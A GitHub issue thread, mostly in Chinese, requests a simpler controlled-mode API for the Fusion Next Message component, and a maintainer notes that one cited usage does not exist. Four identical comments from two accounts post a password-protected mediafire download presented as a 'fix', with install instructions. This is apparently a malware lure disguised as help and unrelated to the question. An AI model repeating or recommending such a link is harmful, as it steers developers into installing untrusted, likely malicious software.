### ISSUE TITLE
[Message]能否有更方便的受控模式 API

### ISSUE THREAD

**Issue by CoderSerio** [alibaba-fusion/next#4919]
### Component 
Message
### Feature Description
# 现状
从文档上看，组件的非受控的默认使用方式是全局单例 Message.notice('xxx')，但受控使用方式需要写形如 `<Message visible={true} />` 的组件来控制。

# 想法
是否可以不用编写组件，减少需要维护的状态和UI？
对于单例，是否可以通过 Message.notice({ visible: true }) 来开启，再通过 Message.notice({ visible: false })关闭；
对于多例，或许可以考虑加入用户自定义字符串参数作为唯一ID，如 Message.notice({ id: "login-error", visible: true })。

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by eternalsky** [comment]
Message 好像没有 `<Message visible={true} />` 这种用法。
